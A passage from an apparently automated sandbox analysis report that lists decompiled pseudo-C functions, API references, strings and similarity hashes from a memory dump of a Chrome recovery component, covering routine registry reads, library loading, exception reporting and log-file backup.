				}
			}

0x00c7a2c1
0x00c7a2c8
0x00c7a2ca
0x00c7a2ce
0x00c7a2d0
0x00c7a2d3
0x00c7a2de
0x00c7a2e1
0x00c7a2e8
0x00c7a2eb
0x00c7a2f2
0x00c7a2f7
0x00c7a2fc
0x00c7a2fe
0x00c7a300
0x00c7a300
0x00c7a30e
0x00c7a317
0x00c7a328
0x00c7a33f
0x00c7a346
0x00c7a34d
0x00c7a355
0x00c7a35a
0x00c7a35c
0x00c7a36b
0x00c7a376
0x00c7a37b
0x00c7a37d
0x00c7a387
0x00c7a387
0x00c7a38c
0x00c7a38e
0x00c7a397
0x00c7a397
0x00c7a399
0x00c7a3a4
0x00c7a3b1
0x00c7a3c2
0x00c7a3c7
0x00c7a3cc
0x00c7a3de
0x00c7a3de
0x00000000
0x00c7a390
0x00c7a390
0x00c7a391
0x00c7a391
0x00000000
0x00c7a396
0x00c7a38e
0x00c7a35e
0x00c7a361
0x00000000
0x00000000
0x00c7a363
0x00000000
0x00c7a32a
0x00c7a332
0x00c7a3e3
0x00c7a3e5
0x00c7a3ed
0x00c7a3f6
0x00c7a401
0x00c7a407
0x00c7a412
0x00c7a412

APIs

RegQueryValueExW.ADVAPI32(?,old-uid,00000000,00000000,00000000,00000000), ref: 00C7A320

Strings

HKCU\Software\Google\Update\, xrefs: 00C7A300, 00C7A30A
; legacy, xrefs: 00C7A3B6, 00C7A3BB, 00C7A3C3
old-uid, xrefs: 00C7A317, 00C7A31C, 00C7A375, 00C7A3AD, 00C7A3D5
uid, xrefs: 00C7A32A, 00C7A37F
HKLM\Software\Google\Update\, xrefs: 00C7A2F7

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: QueryValue
String ID: ; legacy$HKCU\Software\Google\Update\$HKLM\Software\Google\Update\$old-uid$uid
API String ID: 3660427363-3165943210
Opcode ID: bd7e13c59d84429d945397db0c31177c6c8fe375c8820ab893972374f1284469
Instruction ID: 91dcd49db1b9da5666409d38e6e566d4dbdb11a38fd503fff5d23c102e4cf3fd
Opcode Fuzzy Hash: bd7e13c59d84429d945397db0c31177c6c8fe375c8820ab893972374f1284469
Instruction Fuzzy Hash: 20418E7290022AABCF14EBA1CD46CEFBB7CEE55714B108159F909B3161DB749F04EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C81380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00C81380(void* __ebx, void* __ecx, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr* _v40;
				void* __edi;
				void* __ebp;
				signed int _t57;
				char _t60;
				signed int _t67;
				intOrPtr _t68;
				void* _t69;
				intOrPtr* _t70;
				intOrPtr _t72;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t84;
				intOrPtr _t85;
				intOrPtr _t87;
				signed int _t92;
				char _t94;
				intOrPtr* _t98;
				intOrPtr* _t99;
				intOrPtr _t103;
				void* _t110;
				void* _t112;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr* _t120;
				intOrPtr* _t122;
				void* _t125;
				void* _t126;
				void* _t133;

				_t84 = _a4;
				_push(_t112);
				_v5 = 0;
				_v16 = 1;
				 *_t84 = E00C96322(__ecx,  *_t84);
				_t85 = _a8;
				_t6 = _t85 + 0x10; // 0x11
				_t118 = _t6;
				_t57 =  *(_t85 + 8) ^  *0xca8008;
				_push(_t118);
				_push(_t57);
				_v20 = _t118;
				_v12 = _t57;
				E00C81340(_t112, _t118);
				E00C81F67(_a12);
				_t60 = _a4;
				_t126 = _t125 + 0x10;
				_t113 =  *((intOrPtr*)(_t85 + 0xc));
				if(( *(_t60 + 4) & 0x00000066) != 0) {
					__eflags = _t113 - 0xfffffffe;
					if(_t113 != 0xfffffffe) {
						E00C81F50(_t85, 0xfffffffe, _t118, 0xca8008);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t60;
					_v28 = _a12;
					 *((intOrPtr*)(_t85 - 4)) =  &_v32;
					if(_t113 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t92 = _v12;
							_t67 = _t113 + (_t113 + 2) * 2;
							_t87 =  *((intOrPtr*)(_t92 + _t67 * 4));
							_t68 = _t92 + _t67 * 4;
							_t93 =  *((intOrPtr*)(_t68 + 4));
							_v24 = _t68;
							if( *((intOrPtr*)(_t68 + 4)) == 0) {
								_t94 = _v5;
								goto L7;
							} else {
								_t69 = E00C81F00(_t93, _t118);
								_t94 = 1;
								_v5 = 1;
								_t133 = _t69;
								if(_t133 < 0) {
									_v16 = 0;
									L13:
									_push(_t118);
									_push(_v12);
									E00C81340(_t113, _t118);
									goto L14;
								} else {
									if(_t133 > 0) {
										_t70 = _a4;
										__eflags =  *_t70 - 0xe06d7363;
										if( *_t70 == 0xe06d7363) {
											__eflags =  *0xc9812c;
											if(__eflags != 0) {
												_t80 = E00C938B0(__eflags, 0xc9812c);
												_t126 = _t126 + 4;
												__eflags = _t80;
												if(_t80 != 0) {
													_t122 =  *0xc9812c; // 0xc82f1c
													 *0xc97348(_a4, 1);
													 *_t122();
													_t118 = _v20;
													_t126 = _t126 + 8;
												}
												_t70 = _a4;
											}
										}
										E00C81F34(_t70, _a8, _t70);
										_t72 = _a8;
										__eflags =  *((intOrPtr*)(_t72 + 0xc)) - _t113;
										if( *((intOrPtr*)(_t72 + 0xc)) != _t113) {
											E00C81F50(_t72, _t113, _t118, 0xca8008);
											_t72 = _a8;
										}
										_push(_t118);
										_push(_v12);
										 *((intOrPtr*)(_t72 + 0xc)) = _t87;
										E00C81340(_t113, _t118);
										E00C81F18();
										asm("int3");
										_push(_t113);
										_t115 = _v40;
										__eflags =  *((char*)(_t115 + 4));
										if( *((char*)(_t115 + 4)) == 0) {
											L30:
											_t98 = _a4;
											_t74 =  *_t115;
											 *_t98 = _t74;
											 *((char*)(_t98 + 4)) = 0;
										} else {
											_t99 =  *_t115;
											__eflags = _t99;
											if(_t99 == 0) {
												goto L30;
											} else {
												_t110 = _t99 + 1;
												do {
													_t75 =  *_t99;
													_t99 = _t99 + 1;
													__eflags = _t75;
												} while (_t75 != 0);
												_push(_t87);
												_push(_t118);
												_t88 = _t99 - _t110 + 1;
												_push(_t99 - _t110 + 1);
												_t120 = E00C83B1B();
												__eflags = _t120;
												if(_t120 != 0) {
													E00C84D82(_t120, _t88,  *_t115);
													_t78 = _a4;
													_t103 = _t120;
													_t120 = 0;
													__eflags = 0;
													 *_t78 = _t103;
													 *((char*)(_t78 + 4)) = 1;
												}
												_t74 = E00C83557(_t120);
											}
										}
										return _t74;
									} else {
										goto L7;
									}
								}
							}
							goto L32;
							L7:
							_t113 = _t87;
						} while (_t87 != 0xfffffffe);
						if(_t94 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L32:
			}

0x00c81387
0x00c8138b
0x00c8138c
0x00c81392
0x00c8139e
0x00c813a0
0x00c813a6
0x00c813a6
0x00c813a9
0x00c813af
0x00c813b0
0x00c813b1
0x00c813b4
0x00c813b7
0x00c813bf
0x00c813c4
0x00c813c7
0x00c813ca
0x00c813d1
0x00c8142d
0x00c81430
0x00c8143f
0x00000000
0x00c8143f
0x00000000
0x00c813d3
0x00c813d3
0x00c813d9
0x00c813df
0x00c813e5
0x00c81450
0x00c81459
0x00c813e7
0x00c813e7
0x00c813e7
0x00c813ed
0x00c813f0
0x00c813f3
0x00c813f6
0x00c813f9
0x00c813fe
0x00c81414
0x00000000
0x00c81400
0x00c81402
0x00c81407
0x00c81409
0x00c8140c
0x00c8140e
0x00c81424
0x00c81444
0x00c81444
0x00c81445
0x00c81448
0x00000000
0x00c81410
0x00c81410
0x00c8145a
0x00c8145d
0x00c81463
0x00c81465
0x00c8146c
0x00c81473
0x00c81478
0x00c8147b
0x00c8147d
0x00c8147f
0x00c8148c
0x00c81492
0x00c81494
0x00c81497
0x00c81497
0x00c8149a
0x00c8149a
0x00c8146c
0x00c814a2
0x00c814a7
0x00c814aa
0x00c814ad
0x00c814b9
0x00c814be
0x00c814be
0x00c814c1
0x00c814c2
0x00c814c5
0x00c814c8
0x00c814d8
0x00c814dd
0x00c814e1
0x00c814e2
0x00c814e5
0x00c814e9
0x00c81533
0x00c81533
0x00c81536
0x00c81538
0x00c8153a
0x00c814eb
0x00c814eb
0x00c814ed
0x00c814ef
0x00000000
0x00c814f1
0x00c814f1
0x00c814f4
0x00c814f4
0x00c814f6
0x00c814f7
0x00c814f7
0x00c814fd
0x00c814fe
0x00c814ff
0x00c81502
0x00c81508
0x00c8150b
0x00c8150d
0x00c81513
0x00c81518
0x00c8151b
0x00c81520
0x00c81520
0x00c81522
0x00c81524
0x00c81524
0x00c81529
0x00c81530
0x00c814ef
0x00c81540
0x00c81412
0x00000000
0x00c81412
0x00c81410
0x00c8140e
0x00000000
0x00c81417
0x00c81417
0x00c81419
0x00c81420
0x00000000
0x00c81422
0x00000000
0x00c81420
0x00c813e5
0x00000000

APIs

_ValidateLocalCookies.LIBCMT ref: 00C813B7
___except_validate_context_record.LIBVCRUNTIME ref: 00C813BF
_ValidateLocalCookies.LIBCMT ref: 00C81448
__IsNonwritableInCurrentImage.LIBCMT ref: 00C81473
_ValidateLocalCookies.LIBCMT ref: 00C814C8

Strings

csm, xrefs: 00C8145D

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 81a4554a14df39b86861c2c62cdea28fad0842b8416e6933036e5295c3c24999
Instruction ID: 0867b7af2571cc07020357f384e096408e0df68c85969490a7d9d993c5737ccc
Opcode Fuzzy Hash: 81a4554a14df39b86861c2c62cdea28fad0842b8416e6933036e5295c3c24999
Instruction Fuzzy Hash: C7418434A002059BCF10EF69C884ADE7BF9BF4532CF188155ED189B392D731EA56CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00C8A808 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00C8A808(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0xca9640 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0xc98a28 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0xca9640 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0xca9640 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E00C84E2B(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E00C84E2B(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}

0x00c8a811
0x00c8a8a6
0x00c8a819
0x00c8a81b
0x00c8a825
0x00c8a82a
0x00c8a837
0x00c8a84c
0x00c8a850
0x00c8a8b6
0x00c8a8bb
0x00c8a8c2
0x00c8a8c6
0x00c8a8c9
0x00c8a8c9
0x00c8a8cf
0x00c8a8cf
0x00c8a8b1
0x00c8a8b5
0x00c8a8b5
0x00c8a852
0x00c8a85b
0x00c8a894
0x00c8a8a1
0x00c8a8a3
0x00c8a8a3
0x00000000
0x00c8a8a3
0x00c8a865
0x00c8a86a
0x00c8a86f
0x00000000
0x00000000
0x00c8a879
0x00c8a87e
0x00c8a883
0x00000000
0x00000000
0x00c8a888
0x00c8a88e
0x00c8a892
0x00000000
0x00000000
0x00000000
0x00c8a892
0x00c8a82f
0x00000000
0x00000000
0x00000000
0x00c8a835
0x00c8a8af
0x00000000

APIs

FreeLibrary.KERNEL32 ref: 00C8A8C9

Strings

ext-ms-, xrefs: 00C8A873
api-ms-, xrefs: 00C8A85F

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: d4b65f0de1b2d832e6e3eeecc5288179484d105ecb63e59f6203b3330d73d50d
Instruction ID: 516a6a04e4d863f46ba9f9facbb13fa1a1ad7439ac74c08c9c386ecb9c8706f6
Opcode Fuzzy Hash: d4b65f0de1b2d832e6e3eeecc5288179484d105ecb63e59f6203b3330d73d50d
Instruction Fuzzy Hash: 4E212731A11220ABE721BB609C45B5E3758EF42368B150222F915A72D0EB34EE02C7F9

Uniqueness

Uniqueness Score: -1.00%

Function 00C76E50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E00C76E50(intOrPtr* __ecx) {
				intOrPtr _v8;
				struct HINSTANCE__* _t15;
				intOrPtr* _t21;
				intOrPtr* _t28;
				intOrPtr _t32;

				_push(__ecx);
				_t21 = __ecx;
				 *__ecx = 0xca3f80;
				_t1 = _t21 + 0x10; // 0x10
				 *((intOrPtr*)(__ecx + 8)) = 0xca4540;
				_v8 = _t1;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t4 = _t21 + 0x20; // 0x20
				_t28 = _t4;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *_t28 = 0;
				 *((intOrPtr*)(_t28 + 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((char*)(__ecx + 0x34)) = 0;
				 *__ecx = 0xca42b8;
				 *((intOrPtr*)(__ecx + 8)) = 0xca42ac;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				_t15 = GetModuleHandleW(L"kernel32.dll");
				if(_t15 != 0) {
					 *((intOrPtr*)(_t21 + 0x38)) = GetProcAddress(_t15, "RtlCaptureStackBackTrace");
				}
				_t32 = _v8;
				if(E00C93EC9(_t32, 0xc9bd58, 0x10) != 0) {
					_t14 = _t21 + 8; // 0x8
					__imp__RegisterTraceGuidsW(E00C7913F, _t14, _t32, 1, 0xca8aa0, 0, 0, _t28);
				}
				return _t21;
			}

0x00c76e53
0x00c76e55
0x00c76e5e
0x00c76e64
0x00c76e67
0x00c76e70
0x00c76e7a
0x00c76e7b
0x00c76e7c
0x00c76e7d
0x00c76e7e
0x00c76e7e
0x00c76e81
0x00c76e84
0x00c76e86
0x00c76e89
0x00c76e8c
0x00c76e8f
0x00c76e92
0x00c76e98
0x00c76e9f
0x00c76ea2
0x00c76eaa
0x00c76eb8
0x00c76eb8
0x00c76ebb
0x00c76ed0
0x00c76edf
0x00c76ee8
0x00c76ee8
0x00c76ef4

APIs

GetModuleHandleW.KERNEL32 ref: 00C76EA2
GetProcAddress.KERNEL32 ref: 00C76EB2
_memcmp.LIBVCRUNTIME ref: 00C76EC6
RegisterTraceGuidsW.ADVAPI32(00C7913F,00000008,00000000,00000001,00CA8AA0,00000000,00000000,00000020,00000001,00000000), ref: 00C76EE8

Strings

kernel32.dll, xrefs: 00C76E75
RtlCaptureStackBackTrace, xrefs: 00C76EAC

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AddressGuidsHandleModuleProcRegisterTrace_memcmp
String ID: RtlCaptureStackBackTrace$kernel32.dll
API String ID: 658899046-94782561
Opcode ID: 1c4988bdb15305c603ba3b85491b45f7b2c9a2ae3fdac5a1383e1502abf32eb8
Instruction ID: 4afff7a081d0d31e79c5c9ed757b924567e14104932dc8662d8fa680c43712c7
Opcode Fuzzy Hash: 1c4988bdb15305c603ba3b85491b45f7b2c9a2ae3fdac5a1383e1502abf32eb8
Instruction Fuzzy Hash: 141182B1A05301AFDB18CF54DCC9B467BA8EF46714B14416ABD099F345D7F0D940CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00C76D93 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00C76D93(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				short _v2060;
				char _v2064;
				void* __ebp;
				signed int _t11;
				void* _t22;
				void* _t28;
				void* _t40;
				intOrPtr _t43;
				signed int _t45;

				_t11 =  *0xca8008; // 0x617e0cdd
				_v8 = _t11 ^ _t45;
				_t40 = __edx;
				_t28 = __ecx;
				E00C81190(__edx,  &_v2060, 0, 0x802);
				_t43 =  *0xca9f18; // 0x153bb18
				E00C778AC( &_v2064, 0);
				E00C713C0(wsprintfW( &_v2060, L"Exception %x in %s %s %u\r\n\r\n%hs:%d\r\n", _t28, _v2064, _t43, 0, "base\\logging.cc", _t40), _v2064 - 0x10);
				E00C79029( &_v2060);
				_t22 = MessageBoxW(0,  &_v2060, L"Exception", 0x250012) - 3;
				if(_t22 == 0) {
					ExitProcess(0xffffffff);
				}
				if(_t22 == 1) {
					asm("int3");
				}
				return E00C7F35B(_v8 ^ _t45);
			}

0x00c76d9c
0x00c76da3
0x00c76db4
0x00c76db9
0x00c76dbb
0x00c76dc0
0x00c76dce
0x00c76e01
0x00c76e0c
0x00c76e2d
0x00c76e30
0x00c76e49
0x00c76e49
0x00c76e35
0x00c76e37
0x00c76e37
0x00c76e46

APIs

wsprintfW.USER32 ref: 00C76DEF

Part of subcall function 00C79029: lstrlenW.KERNEL32 ref: 00C7902E
Part of subcall function 00C79029: OpenClipboard.USER32(00000000), ref: 00C79038
Part of subcall function 00C79029: EmptyClipboard.USER32(0153BB18,?,?,00C76E11), ref: 00C79043
Part of subcall function 00C79029: GlobalAlloc.KERNEL32(00002002,00000000), ref: 00C79056
Part of subcall function 00C79029: GlobalLock.KERNEL32 ref: 00C7905F
Part of subcall function 00C79029: GlobalUnlock.KERNEL32(00000000,?,?,00C76E11), ref: 00C79075
Part of subcall function 00C79029: SetClipboardData.USER32(0000000D,00000000), ref: 00C7907E
Part of subcall function 00C79029: GlobalFree.KERNEL32(00000000), ref: 00C79089

MessageBoxW.USER32 ref: 00C76E24
ExitProcess.KERNEL32 ref: 00C76E49

Strings

Exception, xrefs: 00C76E16
Exception %x in %s %s %u%hs:%d, xrefs: 00C76DE9
base\logging.cc, xrefs: 00C76DD4

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: Global$Clipboard$AllocDataEmptyExitFreeLockMessageOpenProcessUnlocklstrlenwsprintf
String ID: Exception$Exception %x in %s %s %u%hs:%d$base\logging.cc
API String ID: 489455310-1730742759
Opcode ID: 983c6559ed13c96f4f123412bec59e5da5cb7f53238434235d2c2bc2accbba10
Instruction ID: 1022d84667c12917f73ff08b05a29e5f05ca6966cc1a7bac9bc59db7a9164250
Opcode Fuzzy Hash: 983c6559ed13c96f4f123412bec59e5da5cb7f53238434235d2c2bc2accbba10
Instruction Fuzzy Hash: 9011A374A00218ABCB54EF64DC4AFAE77B8FB45714F008564B559A31D1DE70AE889B90

Uniqueness

Uniqueness Score: -1.00%

Function 00C743CE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00C743CE(intOrPtr __ecx, void* __eflags) {
				WCHAR* _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t8;
				void* _t9;
				intOrPtr _t13;
				void* _t14;
				WCHAR** _t25;
				void* _t30;

				_t30 = __eflags;
				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx;
				_v12 = __ecx;
				OutputDebugStringW(L"LOG_SYSTEM: trying to move log file to backup\n");
				_t25 = _t13 + 0x14;
				E00C747F9( &_v8, _t25, _t30, L".bak");
				_t28 = _v8;
				_t8 = MoveFileExW( *_t25, _v8, 0xb);
				_t14 = 0;
				if(_t8 != 0) {
					_t9 = 0;
				} else {
					_t9 = E00C77ED7();
				}
				if(_t9 >= 0) {
					_t14 = 1;
				} else {
					OutputDebugStringW(L"LOG_SYSTEM: failed to move log file to backup\n");
					_t9 = E00C7444D(_t14, _v12, _t25, _t28);
					_t33 = _t9;
					if(_t9 == 0) {
						_t9 = E00C750F6( *_t25, _t28, _t25, _t33);
					}
				}
				E00C713C0(_t9, _t28 - 0x10);
				return _t14;
			}

0x00c743ce
0x00c743d1
0x00c743d2
0x00c743d6
0x00c743dd
0x00c743e0
0x00c743e6
0x00c743f3
0x00c743f8
0x00c74401
0x00c74407
0x00c7440b
0x00c74414
0x00c7440d
0x00c7440d
0x00c7440d
0x00c74418
0x00c7443c
0x00c7441a
0x00c7441f
0x00c74428
0x00c7442d
0x00c7442f
0x00c74435
0x00c74435
0x00c7442f
0x00c74441
0x00c7444c

APIs

OutputDebugStringW.KERNEL32 ref: 00C743E0
MoveFileExW.KERNEL32 ref: 00C74401
OutputDebugStringW.KERNEL32 ref: 00C7441F

Part of subcall function 00C77ED7: GetLastError.KERNEL32 ref: 00C77ED8
Part of subcall function 00C77ED7: RaiseException.KERNEL32(00000000,00000001,00000000,00000000), ref: 00C77F0A

Strings

LOG_SYSTEM: failed to move log file to backup, xrefs: 00C7441A
LOG_SYSTEM: trying to move log file to backup, xrefs: 00C743D8
.bak, xrefs: 00C743E9

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: DebugOutputString$ErrorExceptionFileLastMoveRaise
String ID: .bak$LOG_SYSTEM: failed to move log file to backup$LOG_SYSTEM: trying to move log file to backup
API String ID: 4067951547-3505153176
Opcode ID: 284b556fe5cbd7de1e844982e3b93a5938e8a8ffefa2f024c5d0266e6e0b0dd5
Instruction ID: 0c4e3a7074178f063da333dd21d6449f8adf723bef201db1a1b07ac9e455d6f8
Opcode Fuzzy Hash: 284b556fe5cbd7de1e844982e3b93a5938e8a8ffefa2f024c5d0266e6e0b0dd5
Instruction Fuzzy Hash: 9D014935350202FFDB1CAF95ED5AAAF7768EF413447104475F505A7251EBB0AE01E750

Uniqueness

Uniqueness Score: -1.00%

Function 00C77A14 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C77A14() {
				void* __edi;
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t3;
				void* _t6;
				void* _t7;
				struct HINSTANCE__* _t8;
				void* _t9;

				if( *0xca9bbc == 0 ||  *0xca9bc8 == 0) {
					_t1 = E00C78D1C(_t6, _t7, _t9);
					if(_t1 != 0) {
						_t1 = GetModuleHandleW(L"kernel32.dll");
						_t8 = _t1;
						if(_t8 != 0) {
							 *0xca9bbc = GetProcAddress(_t8, "CreateMutexExW");
							_t3 = GetProcAddress(_t8, "CreateEventExW");
							 *0xca9bc8 = _t3;
							return _t3;
						}
					}
				}
				return _t1;
			}

0x00c77a1c
0x00c77a28
0x00c77a30
0x00c77a37
0x00c77a3d
0x00c77a41
0x00c77a55
0x00c77a5a
0x00c77a60
0x00000000
0x00c77a60
0x00c77a41
0x00c77a30
0x00c77a66

APIs

GetModuleHandleW.KERNEL32 ref: 00C77A37
GetProcAddress.KERNEL32 ref: 00C77A49
GetProcAddress.KERNEL32 ref: 00C77A5A

Strings

kernel32.dll, xrefs: 00C77A32
CreateMutexExW, xrefs: 00C77A43
CreateEventExW, xrefs: 00C77A4F

Memory Dump Source

Source File: 0000001B.00000002.445759701.0000000000C71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00C70000, based on PE: true

Associated: 0000001B.00000002.445754141.0000000000C70000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445803577.0000000000CA8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000001B.00000002.445807460.0000000000CAB000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_c70000_ChromeRecovery.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: CreateEventExW$CreateMutexExW$kernel32.dll
API String ID: 667068680-2423819206
Opcode ID: cd91f87c2f8b8392b93e56864ecfb2fda2da1342cfba354fa3f41dbe0d9651cb
Instruction ID: 8b03c5fa03ff3abac5de72e897388bf41d9a23055d35d6de2b72c0bc16e2944f
Opcode Fuzzy Hash: cd91f87c2f8b8392b93e56864ecfb2fda2da1342cfba354fa3f41dbe0d9651cb
Instruction Fuzzy Hash: B1E09230508302EBDF208B28BC0EB1D7260A793738F20922AE009932E0DBB483849A20

Uniqueness

Uniqueness Score: -1.00%

Function 00C7C8ED Relevance: 9.1, APIs: 6, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00C7C8ED(intOrPtr* __ecx, intOrPtr* _a4, char _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _t37;
				void* _t39;
				intOrPtr* _t42;
				intOrPtr* _t43;
				char _t45;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t64;
				intOrPtr _t70;
				intOrPtr* _t71;
				intOrPtr _t72;
				void* _t76;
				char _t77;
				void* _t78;
				void* _t79;

				_t74 = __ecx;
				_v8 = 0;
				_t67 =  *__ecx;
				if( *((intOrPtr*)(__ecx + 4)) != 0) {
					_t37 = _a8;
					_t64 = _a12;
					_push(0x10);
					if(_t37 !=  *_t67) {
